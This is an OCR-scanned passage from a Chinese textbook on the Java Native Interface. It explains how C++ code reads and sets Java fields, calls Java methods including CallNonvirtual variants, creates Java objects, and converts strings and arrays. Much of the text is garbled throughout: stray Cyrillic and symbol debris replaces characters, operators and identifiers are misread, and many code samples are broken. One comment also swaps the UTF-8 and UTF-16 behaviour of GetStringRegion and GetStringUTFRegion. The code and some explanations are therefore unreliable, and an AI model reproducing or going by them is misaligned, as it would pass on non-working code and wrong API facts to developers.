hello clazz, "function", "(ILjava/util/Data;[I)I"); 
env-»CalliIntMethod(obj, methodid func, OL, NULL, NULL ); 


上 面 的 native 代 人 码 中 ， 首 先 取得 property 字 段 ， 因 为 property 字 段 是 int 类 型 的 ， 所 以 在 签名 中 传 入 “|” ， 取 得 方法 
function 的 ID 时 : 


int function(int foo, Date date, int[] arr); 
签名 为 (lljava/util/Date; [|) 1. 


关于 Get9StaticFieldID/GetstaticMethod1D 这 两 个 方法 的 用 法 大 同 小 异 ， 区 别 在 于 这 两 个 方法 是 获取 静态 字段 和 方法 的 
ID. 


24 JNIEnv 类 型 中 方法 的 使 用 


前 面 说 到 JNIEnv 类 型 ， 下 面 通过 例子 来 看 一 下 这 些 万 法 的 使 用 。 第 一 个 例子 是 在 Java 代 码 中 定义 一 个 属性 ， 然 后 再 从 
C++ 代 码 中 将 其 设置 成 男 外 的 值 ， 并 且 输 出 来 。 


2.4.1 _native 中 获取 方法 的 Id 


先 来 看 一 下 Java 人 代码: 


package com.jni.demo; 

public class JNIDemo í 

public int number = 0;// 定义 一 个 属性 
ЕХ МЖА ж 

public native void sayHello(); 

public static void main(String[] args)( 
/ / 调用 动态 链接 库 
System.loadLibrary("JNIDemo"); 

JNIDemo jniDemo - new JNIDemo(); 
jniDemo.sayHello( 

System.out.print( 
} 

} 


Pu 
jniDemo.number); 


再 来 看 一 下 C++ 代码 : 


#include<iostream.h> 
#include "com jni demo JNIDemo.h" 


JNIEXPORT void JNICALL Java, com jni. demo JNIDemo sayHello (JNIEnv * env, jobject 
obj) 

( 

/ / 获取 obj 中 对 象 的 class 对 象 

jclass clazz = env-»GetObjectClass (obj); 

/ / 获取 Java F üJ number 字段 的 id( 最 后 一 个 参数 是 number 的 签名 ) 

jfieldID id number = env-»GetFieldID(clazz,"number","I"); 

/ / 获取 number 的 值 

jint number - env-»GetIntField(obj,id number); 

// 输出 到 控制 全 

cout<<number<<end] ; 

// 修改 number WJ ñ у 100, 这 里 要 注意 的 是 jint 对 应 C++ 是 long 类 型 ， 所 以 后 面 要 加 一 个 工 

env-»SetIntField(obj,id number,100L); 

} 


编译 成 功 后 ， 在 Eclipse 运行 后 的 结果 如 图 2-24 所 示 。 
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2-24 运行 成 功效 果 图 


第 一 个 0 是 在 C++ 代码 中 的 cout< <number< «endl, 


第 二 个 100 是 在 Java 中 的 System.out.println (jniDemo.number) 。 


JNIEnvizéit f x22 ByCall «Type» Method3[CallStatic «Type» Method, i*&CallNonvirtual«Type» MethodPegZi, 228 
通过 GetMethodID 取 得 相应 方法 的 methodID 来 传 入 到 上 述 函 数 的 参数 中 。 


调用 示例 方法 的 三 种 形式 如 下 : 


Call«Type»Method(jobject obj,jmethodID id,....); 
Call«Type»Method(jobject obj,jmethodID id,va list lst); 
Call«Type»Method(jobject obj,jmethodID id,jvalue* v); 


第 一 种 是 最 党 用 的 方式 。 第 二 种 是 当 调 用 这 个 函数 的 时 候 有 一 个 指向 参数 表 的 va_list 变 量 时 使 用 的 (很 少 使 用 ) 。 第 三 种 是 
当 调用 这 个 函数 的 时 候 有 一 个 指向 jvalue 或 jvalue 数 组 的 指针 时 用 的 。 


jvalue 在 jni.h 头 文件 中 定义 是 一 个 union 联 合体 ， 在 C/C++ 中 ，union 可 以 存放 不 同类 型 的 值 ， 但 是 当 你 给 其 中 一 个 类 型 赋 
值 忆 后， 这 个 union 融 是 这 种 类 型 了 ， 比 如 你 给 jvalue 中 的 s 赋 值 的 话 ，jvalue 融 变 成 了 jshort 类 型 了 ， 所 以 可 以 定义 一 个 jvalue 
数组 (这样 束 可 以 包含 多 种 类 型 的 参数 了 ) 传递 到 方法 中 ， 如 下 所 示 : 


typedef union jvalue { 
jboolean Z; 
Jbyte 
jchar 
jshort 


`. 


`. 


jint 
jlong 
jfloat 
jdouble 
jobject 


9 `. 


`. 


`. 


= O, по. ьи о б 


`. 


) Jvalue; 


假如 现在 Java 中 有 这 样 的 一 个 方法 : 


boolean function(int a,double b,char c) 


1) 在 C++ 中 使 用 第 一 种 方式 调用 function 方 法 : 


env->CallBooleanMethod(obj , id function , 10L, 3.4 , L'a') 


obj 是 方法 funtion 的 对 象 。id function 是 方法 function 的 id， 可 以 通过 GetMethodID () 方法 获取 。 然 后 就 是 对 应 的 参 
数 ， 这 和 Java 中 的 可 变 参数 类 似 。 最 后 一 个 char 类 型 的 参数 L'a' 为 什么 前 面 要 加 一 个 L 呢 ? 原因 是 Java 中 的 字符 是 Unicode 双 字 


节 的 ， 而 C++ 中 的 字符 是 单字 节 的 ， 所 以 要 变 成 金字 符 ， 即 前 面 加 一 个 L。 


2) 在 C++ 中 使 用 第 三 种 方式 调用 function 方 法 : 


jvalue* args = new jvalue[3];// EX jvalue 数组 
args[0].i = 10L;//i Æ jvalue 中 的 jint 值 
args[1].d = 3.44; 

Aardsl2]4.8 = L'A? 

env-»CallBooleanMethod(obj, id function, args); 


delete[] args;// Жж t184 E WE 


例子 : C++ 中 调用 Java 中 的 方法 。 
Java 代 码 如 下 : 


public double max(double valuel,double value2)t 
return valuel>value2 ? valuel:value2; 


) 


这 时 候 用 javap 获 取 max 方 法 的 签名 ， 如 下 所 示 。 


E: workspace'vJNIDemo\bhin\com\jni\Nemo>javap -s -p JNIDemo.class 
Compiled from "JNIDemo.Jjava" 
public class com.jni.demo.JNIDemo < 
public сот. јпі . дето ..ЈМІ рето<›; 
Signature: СО!) 


public native void ѕауНе110<›; 
Signature: СУ!) 


public static void mainCjava.lang.String[1»5; 
Signature: &«ILjava/lang/String;»U 


public double max€double, double»; 
Signature: 《DD>D 


max 方 法 的 签名 是 (DD) D。 在 C++ 中 的 代码 如 下 : 
JNIEXPORT void JNICALL Java com jni demo JNIDemo sayHello (JNIEnv * env, jobject obj) 


( 
// 获取 obj 中 对 象 的 class 对 象 


jclass clazz = env-»GetObjectClass(obj); 
// 获取 Java 中 的 max 方法 的 id( 最 后 一 个 参数 是 max 方法 的 签名 ) 
jmethodID id max = env-»GetMethodID(clazz,"max","(DD)D"); 


/ / 调用 max 方法 

jdouble doubles = env-»CallDoubleMethod(obj,id max,1.2,3.4); 
// 输出 返回 值 

cout<<doubles<<endl; 


) 
编译 成 动态 文件 后 ， 到 Eclipse 中 执行 sayHello 方 法 ， 运 行 结果 如 图 2-25 所 示 。 
[$i Problems @ Javadoc [i Declaration E] Console zi EB LogCat 3 Debug 


terminated» JNIDemo [Java Application] CAProgram FilesVJavaXre7XAbinjavaw.exe (20139512 H21H #436 
3.4 


图 2-25 ”运行 成 功效 果 图 


可 见 ， 成 功 地 输出 了 最 大 值 。 


2.4.2 Java 和 C++ 中 的 多 态 机 制 


JNIEnv 中 有 一 个 特殊 的 方法 CallNonvirtual<Type>Method， 如 下 所 示 : 


public class Fathert 
public void function()t 
System.out.println("Father.func"); 


public class Child extends Fathert 
public void function()(í 
System.out.println("Child.func"); 
} 


) 
// 这 行 代码 中 执行 的 结果 是 什么 ? 


Father p = new Child(); 
D.füunction5n; 


Вс YBE#— F, bmHRByfunctionze-F2&Bgfunctiong5;E, {Н ТЕС++ А-7: 


class Fatherí 
public: 
void function()(í 
count««"Father.func"-c««endl; 


要 


class Child:public Father( 
public: 
void function()(í 
count««"Child.func"««endl; 

j 

K 

// 下 面 这 段 代 码 执 行 的 结果 是 什么 呢 ? 

Father* р = new Childe(); 

p-»function(); 


这 段 C++ 代 码 中 执行 的 是 父 类 的 function 方 法 ， 如 果 想 执行 子 类 的 function 方 法 怎么 办 呢 ? 就 需要 将 父 类 的 function 方 法 
定义 成 virtual 虚 水 数 : 


class Father{ 
// 这 里 设置 了 虚 函 数 
public: 
virtual void function()( 
count««"Father.func"-««endl; 


15: 


class Child:public Fathert 
public: 
void function()(í 
count««"Child.func"c««endl; 

} 

Fi 

/ / 这 里 执行 的 结 采 是 什么 呢 ? 

Father* p = new Childe(); 

p->function(); 


所 以 ，C++ 和 Java 对 于 继承 后 执行 的 是 父 类 还 是 子 类 的 方法 是 有 区 别 的 ， 在 Java 中 所 有 的 方法 都 是 虚拟 的 ， 所 以 轧 是 调用 
子 类 的 方法 ， 因 此 CalINonVirtual<Type> Method 方 法 就 出 来 了 ， 这 个 方法 可 以 帮助 调用 Java 中 父 类 的 方法 。 


在 JNI 中 定义 的 CalINonvirtual<Type> Method 能 够 实现 子 类 对 象 调用 父 类 方法 的 功能 ， 如 果 想 要 调用 一 个 对 象 的 父 类 方 
法 ， 而 不 是 子 类 的 方法 ， 就 可 以 使 用 CallNonvirtual<Type> Method。 要 使 用 它 ， 首 先 要 获得 父 类 及 其 要 调用 的 父 类 方法 的 
jmethodID， 然 后 传 入 到 这 个 函数 融 能 通过 子 类 对 象 调用 家 履 写 的 父 类 方法 了 。 


例如 : 在 Java 中 定义 Father 类 : 


package com.jni.demo; 

public class Father { 

public void function()fí 
System.out.println("Father:function"); 
} 

) 


定义 一 个 子 类 Child， 继 承 Father 类 ， 重 写 父 类 中 的 function 方 法 : 


package com.jni.demo; 

public class Child extends Fathert 
aOverride 

public void function()fí 
Svaetem,out.printin('Chilldstftunctron"); 
} 

} 


在 JNIDemo 人 代码， 定义 Father 类 型 的 属性 : 


package com.jni.demo; 

public class JNIDemo { 

public Father father = new Child(); 
П ЕХ Sy ma 

public native void sayHello(); 
public static void main(String[] args)t 
/ / 调用 动态 链接 库 

System.loadLibrary ("JNIDemo"); 
JNIDemo jniDemo - new JNIDemo(); 
jniDemo.sayHello(); 

} 

} 


再 来 看 一 下 C++ 中 的 代码 : 


#include<iostream.h> 
#include "com jni. demo JNIDemo.h" 


JNIEXPORT void JNICALL Java, com jni demo JNIDemo sayHello (JNIEnv * env, jobject obj) 
{ 

// 获取 obj 中 对 象 的 class 对 象 

jclass clazz = env-»GetObjectClass(obj); 

// 获取 Java 中 的 father 字段 的 id( 最 后 一 个 参数 是 father 字段 的 签名 ) 

JfieldID id father = env-»GetFieldID(clazz,"father","Lcom/jni/demo/Father;"); 
// 获取 father 字段 的 对 象 类 型 

jobject father = env-»GetObjectField(obj,id father); 

// 获取 father 对 象 的 class 对 象 

jclass clazz father = env-»FindClass("com/jni/demo/Father"); 

/ / 获取 father 对 象 中 的 function 方法 的 id 

jmethodID id father function = env-»GetMethodID(clazz father,"function","()V"); 
// 调用 父 类 中 的 function 方法 ( 但 是 会 执行 子 类 的 方法 ) 
env-»CallVoidMethod(father,id father function); 

/ / 调用 父 类 中 的 function 方法 ( 执行 就 是 父 类 中 的 function 方法 ) 
env-»CallNonvirtualVoidMethod(father,clazz father,id father function); 


| 
编译 成 功 .dl 文件， 回 到 Eclipse 中 运行 结果 参 如 图 2-26 所 示 。 
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Child:function 
Father:function 
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其 中 : 


: Child: function 是 调用 env->CallVoidMethod (http: / /www.hzcourse.com/resource/readBook? 


path= /openresources/teach. ebook /uncomptressed/17266/OEBPS/Text/...) 方法 的 。 


: Father: function 是 调用 env->CallNonvirtualMethod (http:/ /www.hzcourse.com/resource /readBook? 


path=/openresources/teach_ebook/uncomptressed/17266/OEBPS/Text/...) 方法 的 。 


这 样 束 能 够 控制 到 底 调 用 哪个 类 的 function 万 法 了 。 


25 创建 java 对象 及 字符 串 的 操作 方法 
首先 来 看 一 下 C/C++ 中 怎么 创建 java 对 象 ， 然 后 再 介绍 如 何 操作 Java 字 符 审 。 


2.5.1 ” native 中 创建 Java 对 象 
在 JNIEnv 中 有 两 种 方法 创建 Java 对 象 ， 下 面 分 别 介绍 。 
第 一 种 方法 创建 Java 对 象 


代码 如 下 : 


jobject NewObject (jclass clazz , jmethodID methodID, ....) 


参数 如 下 : 
` clazz: 是 需要 创建 的 Java 对 象 的 Class 对 象 。 
: methodID: 是 传递 一 个 方法 的 ID， 想 一 想 Java 对 象 在 创建 的 时 候 ， 需 要 执行 什么 方法 呢 ? 对 ， 没 错 那 就 是 构造 方法 。 


.第 三 个 参数 : НЕЗ Л Adh (默认 的 构造 方法 是 不 需要 传 入 这 个 参数 的 ) 。 所 以 在 创建 java 对象 之 前 要 做 
的 工作 就 是 要 获取 这 个 对 象 的 class 对 象 ， 然 后 再 获取 该 对 象 的 构造 方法 。 想 要 获取 方法 的 id， 就 需要 方法 的 签名 ， 因 为 构造 方法 
没有 返回 值 ， 所 以 认为 类 的 默认 构造 方法 的 返回 值 类 型 的 签名 始终 是 “() V” (因为 默认 的 构造 方法 是 没有 参数 的 ) ， 方 法 的 
名 称 始终 为 “<init>”。 


在 C++ 中 构造 Java 中 的 Date 对 象 ， 并且 调用 它 的 getTime () 方法 打印 当前 时 间 。 
Java 中 的 代码 不 需要 改变 ， 主 要 是 在 C++ 代 码 中 改写 : 


#include<iostream. h> 
#include "com jni. demo JNIDemo.h" 


JNIEXPORT void JNICALL Java, com jni demo JNIDemo sayHello (JNIEnv * env, jobjec 
t obj) 


// 获取 Java 中 Date 4 & Class Ч 
jclass clazz date = env-»FindaClass("java/util/Date"); 
/ / 获取 构造 方法 的 id 


jmethodID mid date = env->GetMethodID(clazz_date,"<init>","()V"); 
// 生成 Date 对 象 
jobject now = env-»NewObject(clazz date,mid date); 


/ / 获取 Date 对 象 中 的 getTime 方法 的 id 


jmethodID mid date getTime = env->GetMethodID(clazz_date,"getTime","()J"); 
/ / 调用 get Time 方法 返回 时 间 
jlong time = env-»CallLongMethod (now,mid, date getTime); 


// 打印 时 间 ， 这 里 要 注意 的 是 不 能 使 用 cout 输出 ， 因 为 cout 并 没有 对 _ int64 的 输出 进行 重 载 ， 
// 要 输出 的 话 用 printf("%I64d",time); 
printf("$I64d",time); 


编译 成 .dll 文 件 ， 在 Eclipse 中 运行 结果 如 图 2-27 所 示 。 


m Problems @ Javadoc ka, Declaration Console 73 EB LogCat 35 Debug 


«terminated» JNIDemo [Java Application] CAProgram Files\Java\yre7\bin\javaw.exe 
1387854554567 


第 二 种 方法 创建 Java 对 象 


用 AllocObject 函 数 创建 一 个 对 象 ， 可 以 根据 传 入 的 jclass 创 建 一 个 Java 对 象 ， 但 是 状态 是 非 初始 化 的 ， 在 这 个 对 象 之 前 绝对 
要 用 CallNonvirtualVoidMethod 来 调用 该 jclass 的 构造 水 数 ， 这 样 就 可 以 延迟 构造 遂 数 的 调用 。 这 种 方法 用 得 很 少 ， 下 面 只 对 
代码 做 简单 的 说 明 。 


Java 中 的 代码 不 做 任何 修改 ，C++ 代 码 修改 如 下 : 


d&include«iostream.h» 
include "com jni demo JNIDemo.h" 


JNIEXPORT void JNICALL Java, com jni. demo JNIDemo sayHello (JNIEnv * env, jobjec 
t obj) 
{ 
// 获取 java 中 的 Date 对 象 
Jclass clazz_date = env->FindClass("java/util/Date"); 
jmethodID methodID str = env->GetMethodID(clazz_date,"<init>","()V"); 
jobject now = env-»AllocObject (clazz. date); 
/ / 调用 构造 方法 
env-»CallNonvirtualVoidMethod(now,clazz date,methodID str); 
/ / 获取 Date 对 象 中 的 getTime 方法 的 id 


jmethodID mid date getTime = env-»GetMethodID(clazz date,"getTime","()J"); 
/ / 调用 get Time 方法 返回 时 间 
Jlong time = env-»CallLongMethod(now,mid date getTime); 


// 打印 时 间 ， 这 里 要 注意 的 是 不 能 使 用 cout 输出 ， 因 为 cout 并 没有 对 _ int64 的 输出 进行 重 载 ， 
// 要 输出 的 话 用 printf("%I64d",time);， 
printf("%I64d",time); 


2.5.2 nativerhREš/EJava= 8 


首先 来 了 解 一 下 Java 和 C/C++ 中 字符 串 的 区 别 。 在 Java 中 ， 使 用 的 字符 串 String 对 象 是 Unicode (UTF-16) 码 ， 即 每 个 字 


— А 


符 不 论 是 中 文 还 是 英文 还 是 符号 ， 一 个 字符 总 是 占 两 个 字 节 。Java 通 过 JN| 接 口 可 以 将 Java 的 字符 串 转 换 到 C/C+ + 中 的 宽 字 符 串 
(wchar t*) ， 或 传 回 一 个 UTF-8 的 字符 串 (char*) 到 C/C++; RIR, C/C + 可 以 通过 一 个 宽 字 符 串 ， 或 一 个 UTF-8 编 码 的 
字 待 串 来 创建 一 个 Java 疾 的 String 对 象 。 


接 下 来 看 一 下 JNIEnv 中 的 一 些 C++ 万 法 。 
1) 获取 字符 串 的 长 度 : 


Jsize GetStringLength(jstring j msg) 
参数 | msg 是 一 个 jstring 对 象 。 


2) 将 jstring 对 象 拷贝 到 const jchar* 指 针 字 符 串 : 


// 这 个 方法 是 : 拷贝 Java 字符 串 并 以 UTF-8 编码 传 入 jstr 


env->GetStringRegion(jstring j msg , Jsize start , jsize len , jchar* jstr); 
// 这 个 方法 是 : Л Java 字符 串 并 以 UTF-16 编码 传 入 jstr 
env->GetStringUTFRegion(jstring j msg , jsize start , jsize len , char* jstr); 


这 是 在 Java 1.297245, AAA Eav FARASE NECC + УЗРА АН, ТЕА ВВ 
一 个 C/C++ 分 配 出 来 的 字符 串 (具体 看 下 面 的 例子 ) ， 然 后 传 入 到 这 个 函数 中 进行 字符 串 的 拷贝 


由 于 C/C++ 中 分 配 内 存 开销 相对 小 ， 而 且 Java 中 的 String 内 容 拷贝 的 开销 可 以 忽略 ,更 好 的 一 点 是 此 消 数 不 分 配 内 存 ， 不 
会 抛 出 OutOfMemoryError 异 常 。 


参数 ]_msg 是 一 个 jstring 对 象 ，start 是 拷贝 字符 串 的 开始 位 置 ，len 是 拷贝 字符 串 的 长 度 ，jstr 是 目标 指针 字符 串 。 
3) 生成 一 个 jstring 对 象 : 

jobject NewString(const jchar* jstr , int size) 

参数 : jstr 是 字符 串 指 针 ，size 是 字符 串 长 度 。 

这 个 方法 可 以 认为 是 将 字符 串 指针 jstr 转 损 成 字符 串 对 象 jstring。 

4) 将 jstring 对 象 转换 成 const jchar* 字 竺 串 指 针 。 有 两 个 方法 : GetstringChars 和 GetstringUTFChars 方 法 。 
GetstringChars 方 法 如 下 : 


const* jchar* GetStringChars(jstring j msg , jboolean* copied) 


Бн] ОТЕ-16%8Н%® {ЕВ (jchar*) , 
参数 如 下 : 
` jmsg 是 字符 串 对 象 。 


:copied 是 指 传 入 的 是 一 个 jbpoolean 指 针 ， 用 来 标识 是 否 对 Java 的 Stting 对 象 进 行 了 拷贝 ， 如 果 传 入 的 这 个 jiboolean 指 针 不 是 
NULL， 则 它 会 给 该 指针 所 指向 的 内 存 传 入 JNIL_TRUE 或 JNIL FALSE 标识 是 否 进行 了 拷贝 ， 传 入 NULL 表 示 不 关心 是 否 拷贝 字符 


事 ， 也 就 不 会 给 jboolean* 指 向 的 内 存 赋 值 。 


其 对 应 的 释放 内 存 指 针 的 方法 : 
ReleaseStringChars(jstring 7j msg , const jchar* jstr) 


IA 


参数 : J msg 是 jstring 对 象 ，jstr 是 字符 串 指 针 。 
GetstringUTFChars 方 法 如 下 : 


const char* GetStringUTFChars(jstring str , Jboolean* copied) 
这 个 方法 是 可 以 取得 UTF-8 编 码 的 字符 串 (char*) 。 参 数 的 舍 义 和 GetstringChars 方 法 是 一 样 的 。 这 个 方法 也 有 对 应 的 一 
个 释放 内 存 的 方法 : 


ReleaseStringUTFChars(jstring jstr , const char*str) 


参数 的 含义 和 上 面 的 ReleaseStringChars 方 法 的 参数 的 含义 是 一 样 的 。 
HENRI 这 两 个 函数 分 别 都 会 有 两 个 不 同 的 动作 : 
: 开辟 一 个 新 内 存 ， 然 后 在 Java 中 的 Stting 拷 贝 到 这 个 内 存 中 ， 然 后 返回 指向 这 个 内 存 地 址 的 指针 。 


- 直接 返回 指向 Java 中 Stting 的 内 存 的 指针 ， 这 个 时 候 千 万 不 要 改变 这 个 内 存 的 内 容 ， 这 个 将 会 破坏 Stting 在 Java 中 始终 是 第 量 


的 这 个 原则 。 


5) 将 jstring 对 象 转化 成 const jchar* FR STT: 


const jchar* GetStringCritical(jstring j msg , jboolean* copied); 


参数 | msg 是 字符 串 对 象 ，copied 同 上 面 的 解释 ， 这 里 就 不 多 说 了 。 


这 个 方法 的 作用 是 为 了 增加 直接 传 回 指向 Java 字 符 串 的 指针 的 可 能 性 〈 而 不 是 拷贝 ) , JDK 1.2 出 来 了 新 的 函数 
GetStringCritical/ReleaseStringCritical, 


在 GetstringCriticaVReleasestringCritical 之 间 是 一 个 天 键 区 ， 在 这 个 天 键 区 域 之 间 不 能 调用 JNI 的 其 他 函数 ， 否 则 将 造成 
关键 区 代码 执行 期 间 垃 圾 回收 器 停止 运作 ， 任 何 触 友 垃 圾 回收 器 的 线程 也 会 暂停 ， 其 他 的 触 友 垃圾 回收 器 的 线程 不 能 前 进 直 到 当 
前 线程 结束 而 激活 垃圾 回收 器 。 就 是 说 在 关键 区 域 中 干 万 不 要 出 现 中 断 操 作 ， 或 在 JVM 中 分 配 任何 新 对 象 ; 否则 会 造成 JVM 死 
锁 。 昌 然 这 个 函数 会 增加 直接 传 回 指 向 Java 字 符 串 的 指针 的 可 能 性 ， 不 过 还 是 会 根据 情况 传 回 拷贝 过 的 字符 串 。 不 文 持 
GetstringUTFCritical， 没 有 这 样 的 尔 数 ， 由 于 Java 字 符 串 用 的 是 UTF-16， 要 转 成 UTF-8 编 码 的 字符 串 始终 需要 进行 一 次 拷贝 ， 
所 以 没有 这 样 的 加 数 。 


这 个 方法 和 第 四 个 方法 是 一 样 的。 其 对 应 的 释放 内 存 指针 的 方法 如 下 : 

env->ReleaseStringCritical(jstring j msg , const jchar* jstr) 

下 面 来 看 一 下 实例 : 在 Java 中 定义 一 个 String 属 性 ， 通 过 控制 台 输 入 值 ， 然 后 定义 一 个 本 地 方法 callCppFunction, 在 
C++ 中 这 个 方法 的 实现 束 是 : 获取 到 Java 中 这 个 字符 串 属 性 ， 将 其 进行 倒序 操作 ， 然 后 再 从 Java 中 输出 。 


先 来 看 一 下 Java 代 人 码 : 


package com.jni.demo; 
import Java.io.BufferedReader; 


import jJava.io.InputStreamReader; 


public class JNIDemo í 
II EX ХЖ ж 

public native void callCppFunction(); 

// 定义 一 个 String 属性 

public String msg = null; 

public static void main(String[] args)throws Exceptioní 
/ / 调用 动态 链接 库 
System.loadLibrary ("JNIDemo"); 
// 从 控制 人 台中 获取 值 


BufferedReader reader=new BufferedReader (new InputStreamReader (System.in)); 


String str = reader.readLine(); 
JNIDemo jniDemo = new JNIDemo(); 
jniDemo.msg - str; 


jniDemo.callCppFunction(); 
System.out.println(jniDemo.msg); 


再 来 看 一 下 C++ 代码 : 


#include<iostream> 
#include"com jni. demo JNIDemo.nh" 
tinclude"windows.h" 
tinclude«string» 
tinclude«algorithm» 

using namespace std; 


JNIEXPORT void JNICALL Java, com jni. demo JNIDemo callCppFunction (JNIEnv * env, 
jobject obj) 


/ / 获取 Java 中 的 属性 :msg 
jfieldID fid msg = env-»GetFieldID(env-»GetObjectClass(obj),"msg","Ljava/ 


lang/String;"); 
/ / 获取 属性 msg 的 对 象 
Jstring j_msg = (jstring)env-»GetObjectField(obj,fid msg); 


/** 第 一 种 方式 START*/ 

/* 

/ [| 获得 字符 串 指 针 

const jchar* jstr = env-»GetStringChars(j msg,NULL); 
// FR З ЕЕ tP 

wstring wstr((const wchar t*)jstr); 

/ / 释放 指针 

env-»ReleaseStringChars(j msg,jstr); 

d 

/ ** 第 一 种 方式 END*/ 


/** 第 二 种 方式 START*/ 

/* 

// 获取 字符 串 指 针 

const jchar* jstr = env->GetStringCritical(j_msg,NULL); 
/ / 转换 成 宽 字 符 囊 

wstring wstr((const wchar t*)jstr); 


/ / 释放 指针 


env->ReleaseStringCritical(j_msg,Jstr); 
ый 

/** 第 二 种 方式 END*/ 

/** 第 三 种 方式 START* / 

// 获取 字符 串 的 长 度 

jsize len = env-»GetStringLength(j. msg); 
// 生成 长 度 为 len 的 字符 串 指 针 

Jchar* jstr = new jchar[len+1]; 

//С++ "PETER '\0' 结尾， 不然 会 输出 意 想不到 的 字符 
jstr[len] = 1'\0'; 

// 将 字符 串 j_msg 复制 到 jstr 中 
env->GetStringRegion(j_msg,0,1en,Jstr); 
// 3 4 BX, + B 

wstring wstr((const wchar t*)jstr); 

/ / ЖАВ T 

delete[] jstr; 

/** 第 三 种 方式 END*/ 


// 将 字符 串 进行 倒序 


reverse(wstr.begin(),wstr.end()); 
/ / ЖАТ FF Je ТАЧ SE 4+ tB 
jstring j new str = env-»NewString((const jchar*)wstr.c str(),(jint)wstr.size()); 


// 将 新 的 字符 串 设 置 变 量 中 
env-»SetObjectField(obj,fid msg,j new str); 


这 里 使 用 了 三 种 方式 实现 功能 。 要 注意 的 是 ， 还 有 一 个 方法 是 将 const jchar* 转 换 成 wstring， 因 为 reverse 万 法 接受 的 参数 
是 wstring。 在 Eclipse 中 的 运行 结果 如 图 2-28 所 示 。 
Lt Problems @ Javadoc [ig Declaration Е Console 23 LogCat гез Debug 
<terminated> JNIDemo [Java Application] CAProgram FileskJavaXre7Xbinjavaw.exe [2013 年 12 月 27 日 下 午 12:09:1: 


ABCDE 
EDCBA 


[12-28 Eclipse 中 的 运行 结果 


2.6 C/C++ 中 操作 Java 中 的 数组 
在 Java 中 数组 分 为 两 种 : 
C 基本 类 型 数组 。 
-ITXA (Object) 的 数组 (数组 中 存放 的 是 指向 Java 对 象 中 的 引用 ) 。 


一 个 能 用 于 两 种 不 同类 型 数组 的 函数 是 GetArrayLength (jarray array) 。 


2.6.1 “操作 基本 类 型 数组 


首先 来 看 一 下 怎么 处 理 基 本 类 型 的 数组 ， 有 如 下 几 种 方法 。 


1.Get<Type>ArrayElements 方 法 


Get<Type>ArrayElements (<Type>Array arr , jboolean* isCopide) 


这 类 函数 可 以 把 Java 基 本 类 型 的 数组 转换 到 C/C++ 中 的 数组 ， 有 两 种 处 理 方式 ， 一 种 是 拷贝 一 份 传 回 本 地 代码 ， 另 一 种 是 
把 指向 Java 数 组 的 指针 和 直接 传 回 到 本 地 代码 中 ， 处 理 完 本 地 化 的 数组 后 ， 通 过 Release<Type>ArrayElements 来 释放 数组 。 


2.Release<Type>ArrayElements 万 法 
Release<Type>ArrayElements (<Type>Array arr , «Type»* array , jint mode) 
用 这 个 函数 可 以 选择 将 如 何 处 理 Java 和 C++ 的 数组 ， 是 提交 ， 还 是 撤销 等 ， 内 人 存 释放 还 是 不 释放 等 。 
mode 可 以 取 下 面 的 值 : 
. 0: 对 Java 的 数组 进行 更 新 并 释放 C/C++ 的 数组 。 
: JNI_COMMIT: 对 Java 的 数组 进行 更 新 但 是 不 释放 C/C++ 的 数组 。 
:JNL ABORT: 对 Java 的 数组 不 进行 更 新 ， 释 放 C/C++ 的 数组 。 
3.GetPrimittiveArrayCritical757X 


GetPrimittiveArrayCritical(jarray arr , jboolean* isCopied) 


4.ReleasePrimitiveArrayCritical757X 


ReleasePrimitiveArrayCritical(jarray arr , void* array , Jint mode) 
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5.Get<Type>ArrayRegion 方 法 


Get«Type»ArrayRegion(«Type»Array arr , jsize start , jsize len , <Type>* buffer) 


在 C/C++ 预 先 开辟 一 段 内 存 ， 然 后 把 Java 基 本 类 型 的 数组 拷贝 到 这 段 内 存 中 ， 这 个 方法 和 之 前 拷贝 字符 串 的 
GetstringRegion 方 法 的 原理 是 类 似 的 。 


6.Set<Type>ArrayRegion 方 法 


Set<Type>ArrayRegion(<Type>Array arr , jsize start , jsize len , const <Type>* 
buffer) 


把 Java 基 本 类 型 数组 中 的 指定 范围 的 元 素 用 C/C++ 数组 中 的 元 素来 赋值 。 


7.<Type>ArrayNew 方 法 


<Type>ArrayNew<Type>Array (JS1Ze sz) 


指定 一 个 长 度 然后 返回 相应 的 Java 基 本 类 型 的 数组 。 


2.6.2 “操作 对 象 类 型 数组 


JNI 没 有 提供 把 Java 对 象 类 型 数组 (Object[]) 直接 转 到 C+ + 中 的 Object[] 数 组 的 函数 ， 而 是 通过 
Get/SetObjectArrayElement 这 样 的 函数 来 对 Java 的 Object[] 数 组 进行 操作 。 由 于 对 象 数 组 没有 进行 拷贝 ， 所 以 不 需要 释放 任何 
资源 。NewObjectArray 可 以 通过 指定 长 度 和 初始 值 来 创建 某 个 类 的 数组 。 


下 面 来 看 个 例子 : 操作 两 种 类 型 的 数组 。 


Java 中 的 代码 : 


package com.jni.demo; 
public class JNIDemo { 
// 定义 一 个 int 型 数组 
intl] arrays = t4 5 12 56 1,23; 45: pI 
// E Х Father 对 象 数 组 
Father[] objArrays = {new Father(),new Father(),new Father()); 
/7 定义 一 个 本 地 方法 
public native void callCppFunction(); 
public static void main(String[] args)throws Exception(í 
// 调用 动态 链接 库 
System.loadLibrary ("JNIDemo"); 
JNIDemo jniDemo - new JNIDemo(); 
jniDemo.callCppFunction(); 


C++ 中 的 代码 : 


#include<iostream> 
#include"com_jni_demo_JNIDemo.h" 
#include<algorithm> 

using namespace std; 


JNIEXPORT void JNICALL Java_com_jni_demo_JNIDemo_callCppFunction (JNIEnv * 
jobject obj) 

{ 
// 获取 Java 中 数组 属性 arrays 的 id 
JfieldID fid arrays = env-»GetFieldID(env-»GetObjectClass(obj),"arrays","[I"); 
// 获取 Java 中 数组 属性 arrays 的 对 象 
jintArray jint arr = (jintArray)env-»GetObjectField(obj,fid arrays); 


// 获取 arrays 对 象 的 指针 
jint* int arr = env-»GetIntArrayElements(jint, arr,NULL); 
/ / 获取 数组 的 长 度 
Jsize len = env->GetArrayLength(jint_arr); 
/ / 打印 数组 中 的 值 
cout««" 数组 的 值 为 :"; 
for(int s =0;s<len;s++){ 
couteelnt атт та sat. Fa 
} 


cout««endl; 


// 新 建 一 个 jintArray 对 象 
jintArray jint arr temp = env->NewIntArray(len); 


// 获取 jint arr. temp 对 象 的 指针 


jint* int arr temp = env-»GetIntArrayElements(jint, arr  temp,NULL); 


// 计数 


lint Counte = 0 


// 偶数 位 存 入 到 int _arr_temp 内 存 中 
for(jsize ј=0;ј<1еп;ј++) { 
LE {J 2=20) 1 
int arr temp[count++] = int агг [5]; 
j 
} 
/ / 打印 int arr temp 内 存 中 的 数组 
